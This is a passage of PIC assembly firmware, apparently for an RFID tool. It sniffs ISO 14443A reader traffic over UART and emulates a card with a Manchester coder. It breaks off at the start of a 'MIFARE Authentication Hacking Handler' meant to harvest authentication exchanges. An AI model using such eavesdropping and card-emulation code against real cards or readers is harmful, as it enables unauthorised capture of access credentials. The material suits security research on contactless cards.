;;      	- cf. above plus the Data field is composed of two-byte records (D, Q),
;;		  where D is a data byte and Q is a control byte
;;		  In this version, only the msb and lsb of Q are meaningful.
;;		  The lsb of Q carries the parity bit iff the msb is zero.
;;		  Remaining bits of Q are cleared.
;;

SniffMode:

; initialize UART
	banksel	SPBRG
	movlw	0x00
	movwf	SPBRG			; 13.56 MHz / 64 '= 212 kbps, i.e. 2-times the speed of ISO 14443
	bcf		TXSTA, BRGH		; low speed constant
	bcf		TXSTA, SYNC		; asynchronous mode
	bcf		TXSTA, TX9		; 8 bits
	bcf		STATUS, RP0		; bank 0
	bsf		RCSTA, SPEN		; serial port enable
	bsf		STATUS, RP0		; bank 1
	bsf		TXSTA, TXEN		; enable TX
	Wait302us				; RB2 was an input tied to L, so we wait for its stabilization

; UART greeting
	banksel	TXREG
	SendUARTByte	'P'
	SendUARTByte	'I'
	SendUARTByte	'C'
	SendUARTByte	'N'
	SendUARTByte	'I'
	SendUARTByte	'C'
	SendUARTByte	' '
	SendUARTByte	'1'
	SendUARTByte	'.'
	SendUARTByte	'3'
	SendUARTByte	'.'
	SendUARTByte	'2'
	SendUARTByte	' '
	SendUARTByte	'R'
	SendUARTByte	'E'
	SendUARTByte	'A'
	SendUARTByte	'D'
	SendUARTByte	'Y'
	btfss	Var_EE_PCF, PCFMillerParity
	goto	SSkipNote
	SendUARTByte	'<'		; indicates the parity is retransmitted
	SendUARTByte	'p'
	SendUARTByte	'>'
SSkipNote:
	SendUARTByte	0x0D
	SendUARTByte	0x0A
	
; if there is no carrier signal, go to sleep
; otherwise enter an IDLE state
SFGoToSleep:	
	bcf		STATUS, RP0
	bcf		STATUS, RP1		; bank 0 with an assurance
	
SFGoToSleep2:
	WaitMillisecond			; eliminate short drop outs
	movf	CMCON, w		; read both C1OUT and C2OUT to cancel mismatch cond.
	andlw	1 << CMP_DEMOD
	btfss	STATUS, Z
	goto	SFWakeUpNow

; notify about field drop out
	SendUARTByte	0x00
	SendUARTByte	0xFF	; can be interpreted as "OFF" :-)
	movlw	9
	movwf	Var_Count1
	nop
	decfsz	Var_Count1, f	; wait for UART TX to
	goto	$-2				; start surely
	bsf		STATUS, RP0		; bank 1
	btfss	TXSTA, TRMT		; wait for last UART TX
	goto	$-1				; completion before going to sleep
	bcf		STATUS, RP0		; bank 0

	bcf		PIR1, CMIF
	bsf		PORTB, PB_BLUE_LED
	sleep
SFWakeUpNow:
	bcf		PORTB, PB_BLUE_LED
	WaitMillisecond			; eliminate short "drop ins"
	btfss	CMCON, CMP_DEMOD
	goto	SFGoToSleep2
	
; STATE SNIFF-IDLE - after a successful wake up, we are here
SFIdleState:
; wait for terminal data
	call	MillerDecoder		;  receive a frame
	btfsc	Var_Flags, MDCarrierLost
	goto	SFGoToSleep			; sleep if the field disappeared 
	call	SendUARTBuffer		; send the data via UART

	goto	SFIdleState			; stay in this state


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Buffer UART transmitter (uses MILLER DECODER BUFFER)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Sends the MD buffer to the UART output.
; Assumes BANK 0, returns in BANK 0.
; INPUT:
;	Var_MD_BitCount	...	number of bits to send
;	Var_MD_Buf		...	buffer to send
;	Var_Flags:MDOverflow	... indicates 256 bit frame to be sent
;	Var_EE_PCF:PCFMillerParity	... indicates the shadow buffer is to be sent, too
; OUTPUT:
;	none
; AFFECTS (besides the output):
;	Var_Count2, FSR, W, STATUS, UART state

SendUARTBuffer:

	movf	Var_MD_ByteCount, w
	movwf	Var_Count2
	SendUARTByte2			; send length in BYTEs anyway (even zero len)
	andlw	0xFF
	btfss	STATUS, Z
	goto	SUBNoZero
	SendUARTByte	0xCC	; produces 00 CC for an erred reception
	return					; buffer is empty - nothing more to send
SUBNoZero:
	movf	Var_MD_BitCount, w	; take the bit count
	andlw	0x07			; modulo 8
	btfsc	STATUS, Z
	movlw	0x08			; using 8 for the zero class instead of 0
	SendUARTByte2			; and send it
	movlw	Var_MD_Buf		
	movwf	FSR				; buffer offset -> FSR
	bcf		STATUS, IRP		; Banks 0, 1
SUB1:
	movf	INDF, w			; take the actual byte
	SendUARTByte2			; and send it
	btfss	Var_EE_PCF, PCFMillerParity
	goto	SUBNoParity
	bsf		FSR, 7			; send the control byte
	movf	INDF, w			; from the shadow bank
	SendUARTByte2
	bcf		FSR, 7
SUBNoParity:
	incf	FSR, f			; move to the next byte
	decfsz	Var_Count2, f	; loop until all bytes sent
	goto	SUB1
	return


#ifdef FAKE_UART
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Deferred UART printing handler (uses DEFERRED PRINT BUFFER)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Sends the Var_DP_Buf buffer to the UART output.
; Assumes any BANK, returns in an undefined BANK.
; INPUT:
;	Var_DP_Len	...	number of bytes to send
;	Var_DP_Buf	...	buffer to send
; OUTPUT:
;	none
; AFFECTS (besides the output):
;	Var_Count2, FSR, W, STATUS, UART state

HandleDP:

	movlw	Var_DP_Len
	movwf	FSR
	bcf		STATUS, IRP	; bank 0, 1 for INDF
	movf	INDF, w		; buffer length
	btfsc	STATUS, Z
	return				; nothing to send
	movwf	Var_Count2
	clrf	INDF		; clear the length indicator
	banksel	TXREG
	SendUARTByte	0x0D	; CR
	SendUARTByte	0x0A	; LF
	SendUARTByte	'$'		; DP job sign
HDP1:
	incf	FSR, f
	movf	INDF, w
	SendUARTByte2
	decfsz	Var_Count2, f
	goto	HDP1
	SendUARTByte	0x0D	; CR
	SendUARTByte	0x0A	; LF
	return
#endif	; FAKE_UART
	

#ifdef FAKE_UART	
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Deferring UART HEX byte printer (uses DEFERRED PRINT BUFFER)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Prints the input byte as HEX into Var_DP_Buf.
; Assumes any BANK, returns in the same BANK.
; INPUT:
;	W	...	input byte to print
; OUTPUT:
;	Var_DP_Len	...	total number of bytes to send
;	Var_DP_Buf	...	buffer to send
; AFFECTS (besides the output):
;	none

DPPrintByte:

; save registers
	movwf	Var_W_Shadow	; preserve W - the input byte
	swapf	STATUS, w		; preserve STATUS
	movwf	Var_STATUS_Shadow
	movf	FSR, w				; preserve FSR
	movwf	Var_FSR_Shadow
	bcf		STATUS, IRP	; bank 0, 1 for INDF
; adjust length indicator and compute the buffer offset
	movlw	Var_DP_Len
	movwf	FSR
	movf	INDF, w		; buffer length
	addlw	256 - DP_BUF_LEN + 1	; we need at least 2 B of free space
	btfsc	STATUS, C
	goto	DPPBFull	; buffer full
	incf	INDF, f
	incf	INDF, f		; we will use 2 bytes
	addlw	DP_BUF_LEN - 1 + Var_DP_Buf
	movwf	FSR
; print first nibble
	swapf	Var_W_Shadow, w
	andlw	0x0F
	addlw	0x30
	movwf	INDF
	addlw	256 - 0x3A
	movlw	0x07
	btfsc	STATUS, C
	addwf	INDF, f
; print second nibble
	incf	FSR, f
	movf	Var_W_Shadow, w
	andlw	0x0F
	addlw	0x30
	movwf	INDF
	addlw	256 - 0x3A
	movlw	0x07
	btfsc	STATUS, C
	addwf	INDF, f
DPPBFull:
; restore registers
	movf	Var_FSR_Shadow, w
	movwf	FSR				; restore FSR
	swapf	Var_STATUS_Shadow, w
	movwf	STATUS			; restore STATUS
	swapf	Var_W_Shadow, f
	swapf	Var_W_Shadow, w	; restore W
	return
#endif	; FAKE_UART


#ifdef FAKE_UART
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Deferring UART char printer (uses DEFERRED PRINT BUFFER)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Puts the input byte (without any change) into Var_DP_Buf.
; Assumes any BANK, returns in the same BANK.
; INPUT:
;	W	...	input byte to put there
; OUTPUT:
;	Var_DP_Len	...	total number of bytes to send
;	Var_DP_Buf	...	buffer to send
; AFFECTS (besides the output):
;	none

DPPrintChar:

; save registers
	movwf	Var_W_Shadow	; preserve W - the input byte
	swapf	STATUS, w		; preserve STATUS
	movwf	Var_STATUS_Shadow
	movf	FSR, w				; preserve FSR
	movwf	Var_FSR_Shadow
	bcf		STATUS, IRP	; bank 0, 1 for INDF
; adjust lenght indicator and compute the buffer offset
	movlw	Var_DP_Len
	movwf	FSR
	movf	INDF, w		; buffer length
	addlw	256 - DP_BUF_LEN 	; we need at least 1 B of free space
	btfsc	STATUS, C
	goto	DPPCFull	; buffer full
	incf	INDF, f		; we will consume one byte
	addlw	DP_BUF_LEN + Var_DP_Buf
	movwf	FSR
; put the byte in
	movf	Var_W_Shadow, w
	movwf	INDF
DPPCFull:
; restore registers
	movf	Var_FSR_Shadow, w
	movwf	FSR				; restore FSR
	swapf	Var_STATUS_Shadow, w
	movwf	STATUS			; restore STATUS
	swapf	Var_W_Shadow, f
	swapf	Var_W_Shadow, w	; restore W
	return
#endif	; FAKE_UART


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PCD data receiver and Miller decoder (up to 64 B; parity bits supported)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Following procedure is the core of the terminal data receiver.
; It waits for an input trigger and then collects the bits
; until the stop or overflow condition occurs.
; All the variables are expected to be in BANK 0.
; Assumes any BANK, returns in BANK 0.
; INPUT:
;	none
; OUTPUT:
;	Var_MD_ByteCount ... number of bytes received (WITHOUT parity - pure data count)
;	Var_MD_BitCount	 ... number of bits received mod 256 (WITHOUT parity - pure data count)
;	Var_MD_Buf 		 ... output buffer
;	Var_MD_BufShadow	... control bytes with parity bits (stored iff PCFMillerParity = 1)
;	Var_Flags:MDCarrierLost	... indicates that basic carrier is lost - suggests going to the sleep state
; AFFECTS (besides the output):
;	Var_MD_a, Var_MD_b, Var_MD_c
;	Var_Count2, FSR, W, STATUS, UART state, TMR1 state, CCP state
;
; Semantics of Var_MD_a, Var_MD_b, and Var_MD_c:
;	Var_MD_a ... sample of reading D flip flop from t_A (a_i)
;	Var_MD_b ... sample of reading D flip flop from t_B (b_i)
;	Var_MD_c ... c_i = a_i xor b_i
;
; Function analysis note: It follows from ISO 14443A that if 8 valid data bits are transmitted,
; then parity bit is allways present and valid. Therefore, the bit-frame of the parity bit cannot
; be used for the leading zero marker of an EOF sequence. It also implies that the sequence of 
; 8 valid data bits cannot be marked as incomplete. This fact has been exploited to simplify the 
; receiving routine. 
;
; ATTENTION: When parity capturing is on, the shadow buffer can possibly grow up to 64 bytes in
; total length hence overwriting the buffer of deferred print jobs. Therefore, these two mechanisms
; shall not be used simultaneously.

#define DO_MD_SYNCHRO	; allow the synchronization
#define TW 160	; the synchronization offset
; Except the case of an error (MDCarrierLost, etc.),
; the first instruction after return starts closely to TW*T_inst apart from the last rising edge.
; This is for reply synchronization as required by ISO 14443-3.
; According to the computation used, the precision is somewhat around 2*T_inst.
; DO NOT forget that just the stop condition after "1" can produce roughly (32+32+16)*T_inst delay since
; the last rising edge on demodulator output. So, it shall be well considered when setting TW.

MillerDecoder:

; initialize the variables
	banksel	Var_MD_Buf		; bank 0
	bcf		STATUS, IRP		; bank 0, 1 for INDF
	bsf		Var_MD_c, 0		; block the stop condition for the first bit
	bcf		Var_Flags, MDCarrierLost
	clrf	Var_MD_BitCount		; clear the counters of bits
	clrf	Var_MD_ByteCount	; and bytes
; buffer initialization - pointer and hot ones
	movlw	Var_MD_Buf
	movwf	FSR
	movlw	0x80
	movwf	INDF			; initialize the primary buffer (bank 0)
	bsf		FSR, 7			; switch to the shadow buffer
	btfsc	Var_EE_PCF, PCFMillerParity
	movwf	INDF			; as well as the shadow buffer if used (in bank 1)
	bcf		FSR, 7			; back to the primary buffer

; initialize timers, counters, etc.
#ifdef DO_MD_SYNCHRO
	movlw	0x01
	movwf	T1CON
	movlw	0x05
	movwf	CCP1CON
#endif
	bsf		STATUS, RP0			; bank 1
	bsf		OPTION_REG, T0CS	; TMR0 in counter mode
	bcf		STATUS, RP0			; bank 0
	clrf	TMR0

; wait for the starting edge
MDPWaitStart:
	btfsc	CMCON, CMP_DEMOD
	goto	MDPWaitStart
variable i = 0
while i < 16
	btfsc	CMCON, CMP_DEMOD
	goto	MDPt_A0
variable i = i + 1
endw
	bsf		Var_Flags, MDCarrierLost	; the basic carrier disappeared
#ifdef DO_MD_SYNCHRO
	bcf		T1CON, TMR1ON	; switch TMR1 off
	clrf	CCP1CON			; switch the CCP unit off
#endif
	return

MDPt_A0:						; skip the start bit frame
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1

; t_A scan point is approaching
MDPt_A:
	movf	TMR0, w	; t_A is HERE
; t_B scan point is approaching
	movwf	Var_MD_a
	bcf		FSR, 7	; (re)set the pointer to the primary buffer
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	movf	Var_MD_b, w		; note that this variable needs not to be initialized - it's "differential" in nature
	xorwf	TMR0, w		; t_B is HERE
	andlw	0x01
	btfss	STATUS, Z	; test if b_(i-1) = b_i
	goto	MDPNoFin1
	btfsc	Var_MD_c, 0	; test if a_(i-1) = b_(i-1)
	goto	MDPNoFin2

; stop condition observed - finalize the reception
MDPFin:
	bcf		FSR, 7	; (re)set the pointer to the primary buffer
	decf	Var_MD_BitCount, w	; release the final zero (result in W!)
	andlw	0x07				; and test whether there is
	btfsc	STATUS, Z			; an open byte requiring finalization
	goto	MDPNoRot				; or not
	incf	Var_MD_ByteCount, f		; the inclomplete byte also counts
MDPRot:
	rrf		INDF, f	; align open bytes
	btfss	STATUS, C	; rotate until the hot one is observed
	goto	MDPRot
MDPNoRot:						; the parity substream (cf. below) may also jump here
	decf	Var_MD_BitCount, f	; the bit counter shall be decremented anyway
MDPFinalSynchro:
; align the instruction flow to a defined distance from
; the last rising modified Miller code edge
; let D = (TMR1L - CCPR1L) mod 256
; let TW be the number of T_inst we want to be apart from the rising edge
; we then need to wait TW - D instruction cycles
; the following equation applies TW - D = 14 + 4*Var_Count2 (after sub-rouding to 0 mod 4)
#ifdef DO_MD_SYNCHRO
MDPRoundUp:
	movf	CCPR1L, w
	subwf	TMR1L, w
	xorlw	0xFF
; we add the hot one together with the number to subtract from together with a rounding constant
	addlw	0x01 + TW - 14
	movwf	Var_Count2
	andlw	0x03
	btfss	STATUS, Z
	goto	MDPRoundUp		; rounding to 0 mod 4
	bcf		T1CON, TMR1ON	; switch TMR1 off
	clrf	CCP1CON			; switch the CCP unit off
	bcf		STATUS, C
	rrf		Var_Count2, f
	bcf		STATUS, C
	rrf		Var_Count2, f
MDPSynchroLoop:
	nop
	decfsz	Var_Count2, f
	goto	MDPSynchroLoop
#endif
	return

; stop condition NOT confirmed - continue with the reception
MDPNoFin1:
	incf	Var_MD_b, f	; we know that b_(i-1) != b_i, so we can repair it without scanning TMR0 again
	nop
MDPNoFin2:
	incf	Var_MD_BitCount, f
	movf	Var_MD_b, w
	xorwf	Var_MD_a, w
	movwf	Var_MD_c
	rrf		Var_MD_c, w
	rrf		INDF, f
	btfss	STATUS, C	; we use the hot one to detect the end of byte
	goto	MDPt_A
	
; end of byte condition occured
; process the parity bit or stop condition
; secondary t_A scan point is approaching
	incf	Var_MD_ByteCount, f		; byte completed (even though we may release its 8th bit later on)
	movf	TMR0, w	; secondary t_A scan point is HERE
; secondary t_B scan point is approaching
	movwf	Var_MD_a
	btfsc	Var_MD_ByteCount, 6	; prevent hot one initialization
	goto	MDPSkipHOInit		; beyond the buffer limits
	movlw	0x80				; otherwise initialize hot ones
	incf	FSR, f				; for the next byte
	movwf	INDF
	bsf		FSR, 7				; shadow buffer
	btfsc	Var_EE_PCF, PCFMillerParity
	movwf	INDF
	decf	FSR, f				; go back for a moment - last control byte is pending
	goto	MDPHOInitCont
MDPSkipHOInit:
	goto	$+1
	goto	$+1
	goto	$+1
	nop
	bsf		FSR, 7		; (re)set the pointer to the shadow buffer
MDPHOInitCont:
	btfsc	Var_MD_c, 0	; decide if we can be in a stop condition
	goto	MDPEofImpossible	; or not
	movf	Var_MD_b, w
	xorwf	TMR0, w	; secondary t_B scan point is HERE (1st order stream)
	andlw	0x01
	btfsc	STATUS, Z
	goto	MDPNoRot	; EOF condition satisfied
; no stop, continue with parity processing (store it in the shadow buffer)
; and the pointer update
	incf	Var_MD_b, f	; update b_i basing on that b_(i-1) != b_i
	movf	Var_MD_b, w
	xorwf	Var_MD_a, w
	movwf	Var_MD_c
	rrf		Var_MD_c, w
	btfsc	Var_EE_PCF, PCFMillerParity	; test whether to store
	rlf		INDF, f						; the parity bit to the control byte lsb
	incf	FSR, f
	nop					; time sync
	btfss	Var_MD_ByteCount, 6		; test for buffer full cond.
	goto	MDPt_A
; buffer full => finish anyway
	goto	MDPFinalSynchro
; EOF condition cannot be satisfied, since a_(i-1) != b_(i-1)
MDPEofImpossible:
	movf	TMR0, w	; secondary t_B scan point is HERE  (2nd order stream)
	movwf	Var_MD_b	; update b_i directly
	xorwf	Var_MD_a, w
	movwf	Var_MD_c
	rrf		Var_MD_c, w
	btfsc	Var_EE_PCF, PCFMillerParity	; test whether to store
	rlf		INDF, f						; the parity bit to the control byte lsb
	incf	FSR, f
	goto	$+1			; time sync
	goto	$+1			; time sync
	nop					; time sync
	btfss	Var_MD_ByteCount, 6		; test for buffer full cond.
	goto	MDPt_A
; buffer full => finish anyway
	goto	MDPFinalSynchro


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PICC data transmitter and Manchester coder
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Following procedure is the core of the Manchester coder and modulator.
; It sends the data starting from the place pointed to by FSR.
; DO NOT FORGET TO INITIALIZE FSR !!!
; DO NOT FORGET TO INCLUDE PARITY BITS (ODD) when neccessary!
; The input data together with the dedicated variables (Var_MC_*)
; are expected to be in BANNK 2.
; The input data are not affected by this procedure.
; Start TX is delayed by 8*T_inst since entering the procedure.
; The dedicated variables are:
; Assumes any BANK, returns in BANK 2.
; INPUT:
;	Var_MC_BitCount	... number of bits to be transmitted
;	FSR				... pointer to the data buffer
; OUTPUT:
;	none
; AFFECTS (besides the output):
;	Var_MC_Mask (actual bit mask), FSR, W, STATUS, UART state
;

ManchesterCoder:
	
; initialize the variables
	banksel	Var_MC_BitCount
	bsf		STATUS, IRP		; bank 2, 3 for INDF
	movlw	0x80
	movwf	Var_MC_Mask	; the mask and FSR point to the actual bit
	decf	FSR, f		; and this is the "virtual" start bit at the begining
	goto	MCOneM4		; sends 4 init pulses and starts the coder

; state ZERO
MCZeroM4:	; send 4 pulses and decide
	M1
	M1
	M1
	bsf		PORTB, PB_MOD
	decf	Var_MC_BitCount, f	; this is a rest from the last MCZero round
	bcf		PORTB, PB_MOD
MCZeroApproach:					; synchro point from One->Zero transition
	nop
MCZero:
	movf	Var_MC_BitCount, f	; prepare the Z flag about the counter
	btfsc	STATUS, Z		; test if there is something to send next
	goto	MCZeroFin		; end of frame after the ZERO state
	bcf		STATUS, C
	rlf		Var_MC_Mask, f	; update the mask for the next bit preview
	btfss	STATUS, C		; hot one detection
	goto	MCZeroNoNext
	bsf		Var_MC_Mask, 0	; restart the mask
	incf	FSR, f			; move to the next byte
	goto	MCZeroFSRUpdated
MCZeroNoNext:
	nop						; time flow compensation
	goto	$+1
MCZeroFSRUpdated:
	movf	Var_MC_Mask, w	; get the mask
	andwf	INDF, w			; test the bit
	btfsc	STATUS, Z
	goto	MCZeroM4		; stay in the ZERO state
	decf	Var_MC_BitCount, f	; this is a rest from above
; continuously transit to the state ONE

; state ONE
MCOneM8:	; send 8 pulses and decide...
	M4
MCOneM4:	; send 4 pulses and decide...
	M1
	M1
	M1
; the last 2 NOP frames are used for something useful
	bsf		PORTB, PB_MOD
	movf	Var_MC_BitCount, f	; prepare the Z flag about the counter
	bcf		PORTB, PB_MOD
	bcf		STATUS, C		; prepare C = 0 for the rotation bellow
MCOne:
	btfsc	STATUS, Z		; test if there is something to send next
	return					; end of frame is implicit - no modulation & return
	decf	Var_MC_BitCount, f	; decrement the number of bits remaining
	rlf		Var_MC_Mask, f	; update the mask for the next bit preview
	btfss	STATUS, C		; hot one detection
	goto	MCOneNoNext
	bsf		Var_MC_Mask, 0	; restart the mask
	incf	FSR, f			; move to the next byte
	goto	MCOneFSRUpdated
MCOneNoNext:
	nop						; time flow compensation
	goto	$+1
MCOneFSRUpdated:
	movf	Var_MC_Mask, w	; get the mask
	andwf	INDF, w			; test the bit
	btfsc	STATUS, Z
	goto	MCZeroApproach	; transit to the ZERO state via the synchro point
	goto	MCOneM4			; stay in the ONE state

MCZeroFin:	; M4 & return
	goto	$+1		; time synchro: plus 12*T_inst
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
	goto	$+1
; now, we are in the middle of the bit frame
	M4				
	return


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Fetch and Extend (parity) Actual Challenge
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; According to Var_ACIndex reads the challenge from EEPROM and stores it
; to the Var_MC_ActualChallenge. The Var_ACIndex is updated APRIORI.
; Assumes any BANK. Returns in BANK 1.
; INPUT:
;	Var_ACIndex		... actual challenge index (gets updated before reading)
;	EE_Challenge(i)	... challenge data in the EEPROM
; OUTPUT:
;	Var_MC_ActualChallenge	... actual challenge with parity bits
;	Var_ACIndex				... actual index pre-incremented mod 3
; AFFECTS (besides the output):
;	Var_Temp2, FSR, W, STATUS, EEADR, EEDATA

FetchAC:

	banksel	Var_MC_ActualChallenge	; bank 2
	movlw	0x80
	movwf	Var_MC_ActualChallenge
	movwf	Var_MC_ActualChallenge + 1
	movwf	Var_MC_ActualChallenge + 2
	movwf	Var_MC_ActualChallenge + 3
	movwf	Var_MC_ActualChallenge + 4
	movlw	Var_MC_ActualChallenge
	movwf	FSR
	bsf		STATUS, IRP	; bank 2, 3 for INDF
	incf	Var_ACIndex, w
	andlw	0x03
	movwf	Var_ACIndex
	movwf	Var_Temp2
	bcf		STATUS, C
	rlf		Var_Temp2, f
	rlf		Var_Temp2, w
	addlw	EE_Challenge1	; w = 4*index + EE_Challenge1
	banksel	EEADR		; bank 1
	movwf	EEADR
	bsf		EECON1, RD
	movf	EEDATA, w
	call	ParityExtender	; Challenge_0
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	call	ParityExtender	; Challenge_1
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	call	ParityExtender	; Challenge_2
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	call	ParityExtender	; Challenge_3
	FinalizeHORR
	return


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Parity extender
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Expect input byte in W, extends it to 9 bits with odd parity,
; and stores the result in INDF.
; In case of byte-crossing, FSR is incremented automatically - the caller shall
; pay attention to proper buffer dimension estimation.
; Hot ones (starting at MSB) are used to detect and cross the byte boundary.
; ATTENTION: The hot ones (0x80) in target buffer must be initialized by the caller!
; The original value of W is destroyed.
; Assumes any BANK. Returns in the same BANK.
; INPUT:
;	W		...	input byte
; OUTPUT:
;	*FSR
; AFFECTS (besides the output):
;	Var_Temp2, Var_Count2, FSR, W, STATUS

ParityExtender:

	movwf	Var_Temp2	; input -> Var_Temp2
	movlw	0x08
	movwf	Var_Count2	; 8 bit rounds
	clrw				; W is a parity register
PaEx1:
	xorwf	Var_Temp2, w	; update parity in W LSB
	rrf		Var_Temp2, f	; input LSB -> C
	rrf		INDF, f		; C -> MSB of shifted INDF
	btfsc	STATUS, C	; hot one test
	incf	FSR, f		; update pointer
	decfsz	Var_Count2, f	; next round...
	goto	PaEx1
	xorlw	0x01		; odd parity
	movwf	Var_Temp2
	rrf		Var_Temp2, f	; parity -> C
	rrf		INDF, f		; C -> MSB of shifted INDF
	btfsc	STATUS, C	; hot one test
	incf	FSR, f		; update pointer
	return

	
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Odd parity for W
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Computes odd parity for the byte stored in W and stores it in MSB of W (W_7).
; Besides the W itself, it affects no other data registers.
; It has no bank assumption, returns in the same bank as it was called from.
; It takes total 15*T_inst, including the final return.
; Assumes any BANK. Returns in the same BANK.
; INPUT:
;	W			... input byte
; OUTPUT:
;	W_7 (msb)	... odd parity for the input	
; AFFECTS (besides the output):
;	STATUS

OddParity:

	addlw	0xC0	; W_7 = (b_7 + b_6 + 1) mod 2
	iorlw	0x40	; W_6 = 1
	addlw	0x20	; W_7 += b_5 (mod 2)
	iorlw	0x60	; W_6 = W_5 = 1
	addlw	0x10	; W_7 += b_4 (mod 2)
	iorlw	0x70	; W_6 = W_5 = W_4 = 1
	addlw	0x08	; W_7 += b_3 (mod 2)
	iorlw	0x78	; W_6 = W_5 = W_4 = W_3 = 1
	addlw	0x04	; W_7 += b_2 (mod 2)
	iorlw	0x7C	; W_6 = W_5 = W_4 = W_3 = W_2 = 1
	addlw	0x02	; W_7 += b_1 (mod 2)
	iorlw	0x7E	; W_6 = W_5 = W_4 = W_3 = W_2 = W_1 = 1
	addlw	0x01	; W_7 += b_0 (mod 2)
	return


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Command Handlers
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Generally speaking, command handler is a subroutine that:
;	a) decides whether or not it can handle the content of Var_MD_Buf
;	b) processes the command (if it can)
;	c) sends an eventual reply to the reader
; Following semantics applies generally to all these handlers:
;	  i) it sets CmdHandled flag iff the command is handled (erred execution also counts)
;	 ii) it sets StayActive flag iff the state machine should stay in ACTIVE1/2 mode
;	iii) it expects the Var_TxOffset to contain the "TX offset" TO the very next TX window (without 1st call)
;	 iv) if the cmd is not handled, it returns "wasted offset" in W
;	  v) all those Tx offsets are rounded to 4*T_inst and include even the primary call time,
;		so the min time spent in a command handler is 1*4*T_inst (call+retlw)
;	 vi) note that mechanism based on Var_TxOffset is just a temporary work around - it shall be
;		 soon replaced by an independent running timer based approach which is considerably easier to use
;	vii) by setting CmdDeferred flag, the handler can note that it wants
;		to continue with next data packet processing, the ID and phase of the process
;		is then stored in Var_Deferred_ID; it is important to see that these
;		state variables are not interpreted by the main dispatcher - it is up
;		to each handler to check whether it postponed its job or not;
;		also note that deferring handlers need to be called before
;		those not deferring (as they do not care about these flags and it
;		can lead to an erred interpretation) - this is for their ordering in
;		the main dispatcher


#ifdef FAKE_UART
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; MIFARE Authentication Hacking Handler (deferring)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Handles any authentication request, replies with actual challenge, and
; sends (postponed print mechanism) the collected data via UART.
;
; It reuires FAKE_UART to be set!
;
; Assumes BANK 0, returns in BANK 0.
; INPUT:
;	Var_MD_BitCount	...	lenght of input command packet in bits
;	Var_MD_Buf		... input command data
;	Var_TxOffset	... TX synchro offset
; OUTPUT:
;	Var_Flags:CmdHandled, Var_Flags:StayActive, Var_Flags:CmdDeferred
;	Var_Deferred_ID	... deferring process ID
;	W				... TX synchro offset delta
; AFFECTS (besides the output):
;	Var_Count2, FSR, W, STATUS, UART state
;	Var_MC_BitCount, Var_MC_Buf, Var_MC_Mask (plus the others used for ManchesterCoder)

MifareHackAuthCmd:

; verify the command phase
	btfsc	Var_Flags, CmdDeferred
